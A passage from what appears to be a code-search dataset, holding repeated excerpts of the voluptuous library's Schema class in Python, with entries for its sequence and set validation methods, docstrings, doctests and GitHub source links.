Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"] | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L469-L596 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_sequence | python | def _compile_sequence(self, schema, seq_type):
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence | Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1] | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L598-L653 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_set | python | def _compile_set(self, schema):
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set | Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a'])) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L685-L723 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
